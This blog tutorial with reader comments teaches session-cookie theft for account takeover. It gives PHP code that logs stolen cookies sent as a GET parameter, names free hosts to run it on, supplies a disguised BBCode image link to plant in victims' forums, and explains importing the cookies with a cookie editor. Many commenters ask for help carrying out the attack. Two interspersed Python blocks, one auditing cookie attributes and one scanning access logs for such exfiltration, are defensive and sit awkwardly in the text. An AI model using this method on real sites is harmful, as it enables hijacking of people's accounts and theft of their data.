How to hack into an email account - cookie logger


Well, one of the questions I am asked most is "How to hack into an email account", so today I am posting a new way to hack into an email account. I am not posting this to excite hackers but to make you aware of what is going around.

Note: This method will only work if the target site is vulnerable to XSS.

Cookies store all the necessary information about one's account; using this information you can hack anybody's account and change their password. If you get the victim's cookies you can hack any account the victim is logged into, i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
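
The caveat a defender adds here: a cookie logger of this kind only receives what document.cookie exposes, so the first check on any site is whether its session cookie carries HttpOnly (and Secure and SameSite). The audit below is an added example, not code from the original post; the header strings are constructed, reusing the phpBB cookie name from the article's logfile sample, and the list of session-name hints is an assumption.

```python
"""Audit Set-Cookie headers for the attributes that blunt cookie theft.
Added example, not from the original post; the headers are constructed samples
using the phpBB session cookie name the article shows in logfile.txt."""

# Substrings that mark a cookie as session-bearing (constructed heuristic).
SESSION_HINTS = ("sid", "sess", "auth", "login", "token")


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes).

    Attribute names are lower-cased; flag attributes such as HttpOnly map to "".
    """
    parts = [p.strip() for p in header.split(";") if p.strip()]
    if not parts:
        return "", "", {}
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return the weaknesses of a session cookie; [] if hardened or not a session cookie.

    HttpOnly is the attribute that stops document.cookie from exposing the value,
    which is exactly what a cookie logger relies on; Secure and SameSite close the
    plain-HTTP and cross-site paths to the same value.
    """
    name, _, attrs = parse_set_cookie(header)
    if not any(h in name.lower() for h in SESSION_HINTS):
        return []
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: sent on cross-site requests")
    return findings


if __name__ == "__main__":
    # Constructed samples: the weak header beside its hardened form.
    WEAK = "phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9; path=/"
    HARDENED = WEAK + "; HttpOnly; Secure; SameSite=Lax"
    for header in (WEAK, HARDENED):
        print(header, "->", audit_set_cookie(header) or "ok")
```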
What is a CookieLogger?

A cookie logger is a script used to steal anybody's cookies and store them in a log file, from which you can read the victim's cookies.

Today I am going to show how to make your own cookie logger.

Step 1
First you have to create a file which can capture a person's cookie. Follow this process.

Download the script

Step 2

Now you have to change "http://rafayhackingarticles.blogspot.com" to your own site. Remember one thing: you should not upload the files into a directory.

Now open Notepad, paste the script into it and save it as fun.gif.

Step 3
Copy the following script into a Notepad file and save the file as cookielogger.php:



<?php
// Appends the value of the "cookie" GET parameter to logfile.txt and
// always answers with the same error text, whatever happened.
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Temporary Server Error,Sorry for the inconvenience.";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        }
    }
    echo "Temporary Server Error,Sorry for the inconvenience.";
    fclose($handle);
    exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>


Step 4: Create a new Notepad file and save it as logfile.txt

Upload these files to your server:

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
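
On the hosting side, the telltale of this logger is a GET request whose query parameter carries a whole Cookie-header string (double-encoded, as the logfile sample below shows). As an added example that is not part of the original post, the Python below scans constructed common-log-format lines for that shape; the log format, the sample lines and the session-name hints are assumptions.

```python
"""Flag cookie exfiltration via a GET parameter in web access logs.
Added example, not from the original post; log lines are constructed samples
mirroring the cookielogger.php?cookie=... request the article describes."""
import re
from urllib.parse import unquote, urlsplit

# Common log format: client ip, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})')
COOKIE_PAIR_RE = re.compile(r'^([\w.\-]+)=')
SESSION_HINTS = ("sid", "sess", "auth", "token")

# Constructed sample: one logger hit (double-encoded phpBB cookies) amid normal traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /fun.gif HTTP/1.1" 302 0',
    '203.0.113.5 - - [10/Oct/2011:13:55:37 +0000] "GET /cookielogger.php?cookie='
    'phpbb2mysql_data%3Da%253A1%253A%257Bs%253A6%253A%2522userid%2522%253Bi%253A-1%253B%257D'
    '%3B%20phpbb2mysql_sid%3D3ed7bdcb4e9e41737ed6eb41c43a4ec9 HTTP/1.1" 200 45',
    '198.51.100.7 - - [10/Oct/2011:13:56:01 +0000] "GET /index.php?page=2&sort=date HTTP/1.1" 200 8123',
]

def cookie_names(raw_value):
    """Return cookie names if the decoded value is shaped like a Cookie header, else []."""
    pairs = [p.strip() for p in unquote(raw_value).split(";") if p.strip()]
    names = []
    for pair in pairs:
        m = COOKIE_PAIR_RE.match(pair)
        if not m:
            return []  # a segment that is not name=value: not a cookie string
        names.append(m.group(1))
    # One pair (e.g. ?next=a=b) is weak evidence unless its name looks session-bearing.
    if len(names) >= 2 or any(h in n.lower() for n in names for h in SESSION_HINTS):
        return names
    return []

def find_cookie_exfil(log_lines):
    """One finding per request whose query string carries a cookie string."""
    findings = []
    for m in filter(None, map(LOG_RE.match, log_lines)):
        parts = urlsplit(m["target"])
        for chunk in filter(None, parts.query.split("&")):
            param, _, raw = chunk.partition("=")
            names = cookie_names(raw)
            if names:
                findings.append({"ip": m["ip"], "path": parts.path,
                                 "param": unquote(param), "cookies": names})
    return findings

if __name__ == "__main__":
    for f in find_cookie_exfil(SAMPLE_LOG):
        print(f"{f['ip']} hit {f['path']} with ?{f['param']}= carrying {f['cookies']}")
```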

If you don't have a website, you can use one of the following free hosts, which have PHP support:

www.ofees.net
www.t35.com
www.ripway.com

Step 5: Go to the victim's forum and insert this code in your signature or a post:


[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]


So the person who clicks it will think it is fun.jpg, but it redirects to fun.gif.

Step 6
If you click the image you will get a temporary error, and you will find the cookie in logfile.txt.


Step 7
Something like this will be stored in your "logfile.txt":

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 8
To get access to the victim's account you need to replace your cookies with the victim's cookies. You can use a cookie editor for this. The string before "=" is the name of the cookie and the string after "=" is its value, so change the values of the cookies in the cookie editor.

For this you will need a Firefox add-on named "Add and Edit Cookies".



53 comments :

  1. Hi :)

    I installed the Cookie Editor app but I still don't quite understand Step 8. Could you please elaborate?

  2. @Anonymous
    Have you got the victim's cookies?

  3. How do I edit cookies? Please suggest something!!!

  4. The thing you mentioned above is quite tricky to understand.
    Step 4
    and step 8 are quite hard to understand.

  5. Where is the victim's forum??? How do I get there?

    Do we have to upload all these 3 to our web host, and what is chmod? Where do we post this, or just upload it on our side? Please answer.
    cookielogger.php -> http://www.yoursite.com/cookielogger.php
    logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
    fun.gif -> http://www.yoursite.com/fun.gif

  6. @Anonymous
    Kindly tell me what you don't understand in Step 4; you need to upload all three files to a web hosting service.

  7. Step 5: Go to the victim's forum and insert this code in the signature or a post

    From where do we get the victim's forum???? And what is (chmod 777)?

  8. Yeah, I don't quite get part 8, the part about putting in values (what kind of values?). Changing my cookies to be their cookies makes no sense :( How would I do that?

  9. I uploaded the files. Now which URL am I to use?? My site is http://h1.ripway.com/TRIDEEB1492/

  10. Can I use anything other than "Edit Cookies"???

  11. @Azri92
    Yes, there are many other tools, but you can Google them; this is the simplest one.

  12. @Anonymous
    The victim's forum means that you can place the link on
    an Orkut scrapbook, Facebook wall or any forum.
  13. Hey dude!
    I already uploaded the 3 files to my site and then gave the link to a forum, but when I try to open the logfile (download), there is no text or anything in it. It is just empty. Can you help me with this?

  14. Got some questions.

    Say a guy clicks on your link. With a different code, obviously, can you steal all of his cookies or just the cookie(s) of the page he was last on (the referrer site)? Can you even steal the passwords he might have stored in his browser?

    Sorry if my questions are the questions of a noobie, but I'm concerned about internet safety and privacy. TY!

  15. @Anonymous
    When the victim clicks on your link, you steal the cookies of the accounts the victim is logged in to.

  16. Step 8 question: "To get the access to the Victim's Account you need to replace your cookies with the Victim's Cookie." *Where can I find my cookies?* "You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor." (What values am I going to substitute for the cookies?) *Can you give me an example? 'Cause this cookie thing is new to me..*

  17. Hello dear, I am in trouble. I am not at all getting the things you have mentioned above in step 2, where you have written to replace 'http://rafayhackingarticles.blogspot.com' with my site.
    I don't have any site, so which one do I have to put?
    And again you wrote to open Notepad and save it as fun.gif.
    Well, I have already opened it when editing the URL, right? So why open another Notepad again? And how do I save a text file in GIF (image) format? I am completely confused here. Will you please explain?

    Then I am again confused in step 5: the victim will think it's fun.jpg but it will redirect to fun.gif?
    So please let me know it clearly. I am confused! Sorry to disturb you. [:(]

  18. Please... I saved script 1 as fun.gif,
    but when I try to open it as mywebsite.com/fun.gif
    it shows that it has some errors.
    I'm using 0fees.net.
    Then I renamed the file to fun.php;
    then when I tried to open it on the web
    it comes up as a blank page... and the logfile is blank too...
    Please, can you give me a solution for that?
    :D Thank you! :]

  19. I did every step very carefully, but when I tried to hack my own account, it's not working. I saved all the files to the root directory. I just did every step the way you told, but when I posted it the way you said, and then when I clicked that signature or link to the jpg image, it opens a new web page saying 'Address not found'. Then I thought the work was done, but when I downloaded that logfile, there was nothing in it.

    It's not working...
    What to do???
    Reply as soon as possible.

    And yes, I tried to hack my Facebook account. It's not getting posted on the wall, but you can message that signature...

  20. Cookie stealing or session hijacking only works with those sites which have an XSS vulnerability.
  21. I think it's quite simple.
    1) You create a fake site and add the script.
    2) When a visitor visits your site, the visitor's cookie will be copied into logfile.txt.
    3) You copy the file and replace your cookie with it.
    4) So if you are able to visit the site that the user is currently logged in to, and the cookie you just copied contains its session ID, then you can find yourself logged in as that person.

    If you are on the same subnet you can use MITM using arpspoof, hamster, ferret to gain cookie info.

  22. Is there another way to get cookies?

  23. Sorry, I could not understand step 8. It is mentioned here: "To get the access to the Victim's Account you need to replace your cookies with the Victim's Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor." But how do I get my cookie and where is it available, and also how do I get the victim's cookie and where is it available? So, please elaborate on this.

  24. @Anonymous
    I see you don't have basic knowledge of cookie editing and cookie capturing. I recommend you read my book:
    www.hacking-book.com

  25. What should be the CHMOD of the fun.gif file? Because I saved it with CHMOD 644, and when I open it I get the code of the fun.gif file on the screen and the logfile.txt remains empty..

    Please reply. I entered the link of the fun.gif file in the URL..

  26. @Dhruv
    Kindly change the permissions of the .txt file to 777 so it can write the traced cookies.

  27. Thanks brother... Are you Pakistani??? I have to discuss something really important with you. My mail address is fowad89@yahoo.com ... Please bro, I'll be waiting for your mail.... Contact me ASAP... Thanks, G.B.U

  28. Can I hack a blogspot account with this?

  29. Dude, check your script... I downloaded it but it's not working.

  30. I can't post that link on Facebook.. it is marked as flagged..

  31. I clicked the gif link myself and when I open my logfile.txt with my FTP client, it shows a blank thing?

  32. Where will I receive the cookies, dear? I have done everything as you said and sent it. Please help me out!!!
  33. I have done everything you said and uploaded them to my web hosting, and I have changed the permissions (chmod), but nothing is written in the logfile.txt.
    That's what appears when I press the /fun.gif:
    http://img600.imageshack.us/img600/3457/116201131423am.png

  34. @MoSeBA
    This hack works only on the forums/blogs which are vulnerable to XSS (Cross site scripting). Try finding a website/forum vulnerable to XSS and then try it.

  35. Where will I receive the cookies? I have done everything as you said and sent it. Please help me out!!! How can I change the cookies, or what should be the cookies' place?

  36. Does it work on Facebook and Hotmail?

  37. [url=http://www.127.0.0.1/fun.gif][img]http://www.127.0.0.1/fun.jpg[/img][/url]

  38. In step 2, change "http://rafayhackingarticles.blogspot.com" to your site. I am not getting what my site is. How can I make my site? I have already hacked cookies with Wireshark on the same network in which I work. I also know how to hack a Gmail password using a forged page. But I am not getting what my site is, so please explain it briefly, not in a short way.
    Thank you

  39. Hi. I have been using this (web hosting www.ripway.com) site. I have a small problem: I am not able to create a chmod 777 log file... Could you help me with it? :)

    Thanks

    Akram ...

  40. Hey, I have been using (www.ripway.com) but I have got a problem in creating the log file... How do I make it chmod 777 compatible???

    Thanks

    Akram

  41. cookielogger.php -> http://www.yoursite.com/cookielogger.php
    logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
    fun.gif -> http://www.yoursite.com/fun.gif

    What is this and how can I upload it?

  42. I have done everything you said, but I didn't get the cookie into the logfile...
    If we click the signature, the error I am getting is "404 page not found"... Where could the error possibly be???
    Kindly help me with this... Thanks in advance...

  43. I have done whatever you said, bhai... Web hosting etc., everything.... Instead of a victim, when I paste it in the address bar it says: Your search - [url=http://www.samthedevil.biz.ly/fun.gif][img]http://www.samthedevil.biz.ly/fun.jpg[/img][/url] - did not match any documents.

  44. The Add and Edit Cookies add-on is not available in the latest Firefox.. any other add-on?

  45. I have done all the things you told but it's not working..

  46. Facebook blocks the URL:
    [url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
    What should I do?

  47. Please, I don't understand all this. I have tried it but still it's not working. Can you please explain it very well?

  48. The code is not recording anything in the log file.

  49. When I download the script it says the archive is corrupted or damaged.


Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..


RHA © 2013. All Rights Reserved.